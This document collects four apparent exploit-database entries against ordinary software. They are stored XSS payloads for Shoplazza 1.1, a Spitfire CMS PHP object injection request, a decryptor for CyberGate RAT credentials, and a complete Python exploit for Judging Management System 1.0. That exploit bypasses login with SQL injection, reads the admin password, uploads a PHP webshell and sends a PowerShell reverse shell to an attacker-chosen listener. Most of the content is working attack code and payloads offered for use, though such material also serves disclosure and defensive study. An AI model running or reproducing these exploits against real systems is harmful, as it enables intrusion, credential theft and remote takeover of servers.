<pre><code># Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting # Exploit Author: Andrey Stoykov # Software Link: https://github.com/Shoplazza/LifeStyle # Version: 1.1 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post" 3. Select "Title" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"\"><script>alert(3)</script>"[...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [...] {"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...] // HTTP GET request to trigger XSS payload GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 [...] <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"> <title>Title"><script>alert(1)</script></title> <meta name="keywords" content="test1205"> [...] Stored XSS #2: To reproduce do the following: 1. Login as normal user account 2. Browse "Products" -> "Create Product" 3. Select "Subtitle" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload POST /admin/api/admin/v2_products HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"Description"[...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [...] {"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections [...] Stored XSS #3: To reproduce do the following: 1. Login as normal user account 2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement" 3. Select "Text" section and enter payload "><script>alert(1)</script> 4. Select "Mobile Text" section and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 // HTTP response showing unsanitized XSS payload {"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...] Stored XSS #4: 1. Login as normal user account 2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" 3. Select "Subheading" and enter payload "><script>alert(1)</script> 3. Select "Heading" and enter payload "><script>alert(1)</script> 4. Select "Text" and enter payload "><script>alert(1)</script> 5. Select "Button Text" and enter payload "><script>alert(1)</script> 6. Select "Label" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>", [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 [...] {"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>" [...] Stored XSS #5: 1. Login as normal user account 2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" 3. Select "Heading" and enter payload "><script>alert(1)</script> 4. Select "Description" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script> [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 [...] {"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script> [...] Stored XSS #6: 1. Login as normal user account 2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping" 3. Select "Heading" and enter payload "><script>alert(1)</script> 4. Select "Text" and enter payload "><script>alert(1)</script> 5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping" 6. Select "Heading" and enter payload "><script>alert(1)</script> 7. Select "Text" and enter payload "><script>alert(1)</script> 8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount" 9. Select "Heading" and enter payload "><script>alert(1)</script> 10. Select "Text" and enter payload "><script>alert(1)</script> 11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon" 12. Select "Heading" and enter payload "><script>alert(1)</script> 13. Select "Text" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>" [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 [...] {"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script> [...] Stored XSS #7: 1. Login as normal user account 2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow" 3. Select "Title" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] {"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script> [...] HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 [...] {"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>" [...] </code></pre>

<pre><code># Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE) # Date: 12/11/2022 # Exploit Author: Angelo Pio Amirante # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 on XAAMP server import requests,argparse,re,time,base64 import urllib.parse from colorama import (Fore as F,Back as B,Style as S) from bs4 import BeautifulSoup BANNER = """ ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║ ╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝ """ def argsetup(): desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) args = parser.parse_args() return args # Performs Auth bypass in order to get the admin cookie def auth_bypass(args): print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") session = requests.Session() loginUrl = f"{args.target}/login.php" username = """' OR 1=1-- -""" password = "randomvalue1234" data = {'username': username, 'password': password} login = session.post(loginUrl,verify=False,data=data) admin_cookie = login.cookies['PHPSESSID'] print(F.GREEN+"[+] Admin cookies obtained !!!") return admin_cookie # Checks if the file has been uploaded to /uploads directory def check_file(args,cookie): uploads_endpoint = f"{args.target}/uploads/" cookies = {'PHPSESSID': f'{cookie}'} req = requests.get(uploads_endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(req.text,features='html.parser') files = soup.find_all("a") for i in range (len(files)): match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) if match: file = files[i].get('href') print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) return file return None def file_upload(args,cookie): now = int(time.time()) endpoint = f"{args.target}/edit_organizer.php" cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} get_req = requests.get(endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(get_req.text,features='html.parser') username = soup.find("input",{"name":"username"}).get('value') admin_password = soup.find("input",{"id":"password"}).get('value') print(F.GREEN + "[+] Admin username: " + username) print(F.GREEN + "[+] Admin password: " + admin_password) # Multi-part request file_dict = { 'fname':(None,"Random"), 'mname':(None,"Random"), 'lname':(None,"Random"), 'email':(None,"ranom@mail.com"), 'pnum':(None,"014564343"), 'cname':(None,"Random"), 'caddress':(None,"Random"), 'ctelephone':(None,"928928392"), 'cemail':(None,"company@mail.com"), 'cwebsite':(None,"http://company.com"), 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"), 'username':(None,f"{admin_password}"), 'passwordx':(None,f"{admin_password}"), 'password2x':(None,f"{admin_password}"), 'password':(None,f"{admin_password}"), 'update':(None,"") } req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict) def exploit(args,cookie,file): payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" cookies = {'PHPSESSID': f'{cookie}'} print(F.GREEN + "\n[+] Enjoy your reverse shell ") requests.get(uploads_endpoint,verify=False,cookies=cookies) if __name__ == '__main__': print(F.CYAN + BANNER) args = argsetup() cookie=auth_bypass(args=args) file_upload(args=args,cookie=cookie) file_name=check_file(args=args,cookie=cookie) if file_name is not None: exploit(args=args,cookie=cookie,file=file_name) else: print(F.RED + "[!] File not found") </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/618f28253d1268132a9f10819a6947f2.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0) Vulnerability: Insecure Proprietary Password Encryption Family: CyberGate Type: PE32 MD5: 618f28253d1268132a9f10819a6947f2 Vuln ID: MVID-2022-0664 Disclosure: 12/11/2022 Description: This well known RAT malware stores credentials using a proprietary insecure encryption routine in its "Settings.ini" file. The recovery procedure is trivial to decrypt stored credentials. theres no key, xor or combined encrypt mechanism and relies on basic SUB, ADD and bitwise operations SHR and SHL. Analysis of the following single encrypted character table reveal the pattern 0,G,W,m that repeats every few alpha-numeric characters a-c, d-g, h-k etc... E.g. a=OG b=OW c=Om d=P0 e=PG f=PW g=Pm h=Q0 i=QG j=QW k=Qm l=R0 m=RG n=RW o=Rm p=S0 q=SG r=SW s=Sm t=T0 u=TG v=TW w=Tm x=U0 y=UG z=UW "Settings.ini" senhaconexao=OM9Z For example, the password "abc" is stored as "OM9Z", in order to recover the first character we need only perform the following bitwise operations SUB, ADD, SHR and SHL. OM9Z = "abc" To recover the first password character, use the first two stored values "OM" which will return the ascii value "a". key="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/" get 'a' b="PQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/" eax = len(key) - len(b) eax 25 ebx = eax -1 ebx 24 b="NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/" ecx = len(key) - len(b) ecx 23 edx = ecx -1 edx 22 ebx << 6 1536 hex(1536) '0x600' hex(22) '0x16' 0x600 + 0x16 1558 hex(1558) '0x616' 0x616 >> 4 97 hex(97) '0x61' 61 = 'a' PoC Video: https://www.youtube.com/watch?v=PAkKo2dLGwQ Exploit/PoC: "CyberGate_Trojan_Decryptor.py" import argparse, sys, time, os, atexit from operator import * #CyberGate v1.00.0 - Insecure Proprietary Password Encryption #========================================================================= #Basic password decryptor for the following RAT malwares: # #Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0) #MD5: 618f28253d1268132a9f10819a6947f2 # #Spy-Net 2.7 Beta 02 - Backdoor.Win32.Shpinat.a #MD5: eaf37e9506ef76f6d26838692d76aabd # #By John Page (aka hyp3rlinx) Copyright (C) circa 2022 #malvuln.com #malvuln13@gmail.com #twitter.com/malvuln #========================================================================= # #PoC to decrypt credentials due to flawed proprietary encryption. #RAT password save usage: #Click 'START' / Options then choose 'Select listening ports' from menu. #Enter a new password in the 'Connection Password' field and click save. #Password gets stored in 'Settings.ini' file. # #Note: Should recover most numeric and or lowercase passwords. May return #multiple password candidates depending on the password recovered. #Some limitation with long and or complex passwords, did not put much time on it! # #TODO: Better handle complex long mixed letters and or repeating characters. #Author is NOT responsible for any misuse or incorrect password recovery, #the user accepts ALL risk by using the software. # #MIT License - Copyright (c) 2022 malvuln #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. # #DISCLAIMER: #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #Permission is also explicitly given for insertion in vulnerability databases and similar, #provided that due credit is given to the author: #John Page (aka malvuln/hyp3rlinx) Copyright (C)(TM) 2022 #========================================================================= BANNER=""" ____ ______ __ / __ \___ _________ ___ __ / ____/________ ______/ /_____ _____ / / / / _ \/ ___/ __ `/ / / / / / / ___/ __ `/ ___/ //_/ _ \/ ___/ / /_/ / __/ /__/ /_/ / /_/ / / /___/ / / /_/ / /__/ ,< / __/ / /_____/\___/\___/\__,_/\__, / \____/_/ \__,_/\___/_/|_|\___/_/ /____/ v1 By Malvuln (c) circa 2022 """ #Console colors RED="\033[1;31;40m" GREY="\033[1;30;40m" GREEN="\033[1;32;40m" CYAN="\033[1;36;40m" YELLOW="\033[1;33;40m" BOLD = "\033[1m" ENDC = "\033[m" #Default key=["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I", "J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b", "c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u", "v","w","x","y","z","+","/"] result="" sz=0 key_error=False #Change console back to default if script exited unclean def exit_handler(): print(ENDC) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-c", "--creds", help="Password to decrypt, see --about") parser.add_argument("-a", "--about", nargs="?", const="1", help="About Decay password decryptor") parser.add_argument("-e", "--example", nargs="?", const="1", help="Password test samples") return parser.parse_args() def usage(): print(RED+"[+] "+CYAN+"Encrypted password samples:"+GREY) print("[+]----------------------------") print("[-] GM9ZCJ8p8G : Abc123!") print("[-] KsLZScLqNp4 : Secret_1") print("[-] U7bwDZOsNpC : xyz666_3") print("[-] PsXlStG : ghost") print("[-] CZKmDZSuCp8q : 250678324") print("[-] P6bXOcnlC34oCm : diablo0123") print("[-] INTbON91JM5dRdLj : IwearAMagnum") print("[-] ON1mON9fT6blRdDbOm : apparitionsec") def info(): print(RED+"[$] "+GREY+"Credits: John Page (aka hyp3rlinx)") print("[!] Recovers most simple lowercase or numeric passwords for:") print("[-] Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)"+GREY) print("[-] "+RED+"MD5: "+GREY+"618f28253d1268132a9f10819a6947f2") print("[-] Backdoor.Win32.Shpinat.a (Spy-Net 2.7 Beta 02)"+GREY) print("[-] "+RED+"MD5: "+GREY+"eaf37e9506ef76f6d26838692d76aabd") def main(args): if args.creds: recover(args.creds) if args.about: info() if args.example: usage() shf_map = {"0" : 6, "m" : 3, "p" : 3, "3" : 3, "M" : 6, "6" : 6, "C" : 3, "2" : 2, "D" : 3, "7" : 7, "s" : 6, "R" : 6, "J": 3, "Z": 3, "G" : 6, "o": 2, "W" : 6, "K" : 12, "c" : 6, "a" : 6, "4" : 6, "t" : 7, "q" : 12, "N" : 7, "7" : 7, "L" : 5, "r" : 6, "d" : 7, "I" : 2, "5" : 6, "Y" : 2} def chunk(char): c=-1 key_len=len(key) #64 for i in key: c+=1 if i==char: cnt = c #Grab part up to including the first char arg. tmp = key[c + 1:] return key_len - len(tmp) def doit(paswd): global key_error CREDZ="" lst = paswd.split(",") i=0 EBX=0 ECX=0 TMP=0 LSH=0 for x in paswd: i+=1 x = x.strip() EAX = chunk(x) EBX = EAX -1 EBX_CPY = EAX -1 if i > 1: #ADD TMP = int(hex(add(int(ECX), EBX_CPY)), 16) #SHR if i== 2: TMP = TMP >> 4 CREDZ = chr(TMP) if i == 3: TMP = TMP >> 2 CREDZ += chr(TMP) if i == 4: CREDZ += chr(TMP) #SHL if i==1: EBX = EBX << 6 ECX = int(hex(EBX), 16) if i==2: #Assign once if LSH ==0: try: LSH = int(shf_map[x]) except KeyError as e: #Fail safe just in case print("[!] Key Error: Try adding a value for "+str(e)+" to the 'shf_map' dictionary.") key_error=True pass EBX = LSH << 6 ECX = int(hex(EBX), 16) if i==3: #At end no SHL EBX = 1 << 6 if LSH < 6: ECX = EBX - EBX else: ECX = int(hex(EBX), 16) time.sleep(0.1) return CREDZ def recover(paswd): global result, sz tmp="" c=0 sz=len(paswd) print("[+] "+CYAN+"Recovering: "+GREY+paswd) print("[-] Initial len: "+str(len(paswd))) for i in paswd: c+=1 tmp += i #Handle single char passwds if sz == 2: result = doit(paswd) return #Process in chunks of four bytes if c == 4: paswd = paswd[c:] print("[+] cracking: " +tmp + " " +str(len(paswd))) result += doit(tmp) tmp="" c=0 #Process leftover bytes if len(paswd) == 3: if c==3: print("[+] cracking: " +tmp + " " +str(len(paswd))) tmp += paswd[c:] result += doit(tmp) c=0 elif len(paswd) == 2: tmp += paswd[c:c] result += doit(tmp) c=0 if __name__=="__main__": parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) os.system("color") print(RED+BANNER+GREY) print(RED+"[$] "+GREY+"CyberGate (Spy-Net) Trojan RAT") print(RED+"[$] "+GREY+"Basic Password Decryptor") atexit.register(exit_handler) main(parse_args()) candidate2="" if result: if sz >= 8: if result[len(result)-1:] == "p": candidate2 = result[:len(result) -1] + "0" if result[len(result)-1:] == "q": candidate2 = result[:len(result) -1] + "1" if result[len(result)-1:] == "r": candidate2 = result[:len(result) -1] + "2" if result[len(result)-1:] == "s": candidate2 = result[:len(result) -1] + "3" if result[len(result)-1:] == "t": candidate2 = result[:len(result) -1] + "4" if result[len(result)-1:] == "u": candidate2 = result[:len(result) -1] + "5" if result[len(result)-1:] == "v": candidate2 = result[:len(result) -1] + "6" if result[len(result)-1:] == "w": candidate2 = result[:len(result) -1] + "7" if result[len(result)-1:] == "x": candidate2 = result[:len(result) -1] + "8" if result[len(result)-1:] == "y": candidate2 = result[:len(result) -1] + "9" if key_error: print("[*] Likely partially recovered credz: ==> "+result) else: if not candidate2: print("[*] Probable credz: ==> "+RED+result+GREY) else: print("[*] Probable credz: ==> "+RED+result+GREY+" OR "+RED+candidate2+GREY) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code> Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection Vendor: Claus Muus Product web page: http://spitfire.clausmuus.de Affected version: 1.0.475 Summary: Spitfire is a system to manage the content of webpages. Desc: The application is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input. ----------------------------------------------------------------------- cms/edit/tpl_backup.inc.php: ---------------------------- 47: private function status () 48: { 49: $status = array (); 50: 51: $status['values'] = array (); 52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array (); ... ... 77: public function save ($values) 78: { 79: $values = array_merge ($this->status['values'], $values); 80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30); 81: } ----------------------------------------------------------------------- Tested on: nginx Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5720 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php 28.09.2022 -- > curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \ -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Connection: close' \ -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \ --data 'action=save&&value=1' #--data 'action=save&&value[files]={}' </code></pre>